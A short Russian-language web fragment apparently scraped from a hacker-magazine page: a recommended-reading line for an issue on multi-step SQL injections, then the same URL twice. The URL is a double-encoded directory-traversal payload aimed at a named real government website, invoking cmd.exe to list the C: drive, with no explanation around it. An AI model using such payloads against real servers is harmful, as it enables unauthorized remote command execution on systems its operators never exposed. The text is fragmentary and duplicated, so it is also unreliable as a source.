Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
http://www.energystar.gov/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.energystar.gov/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\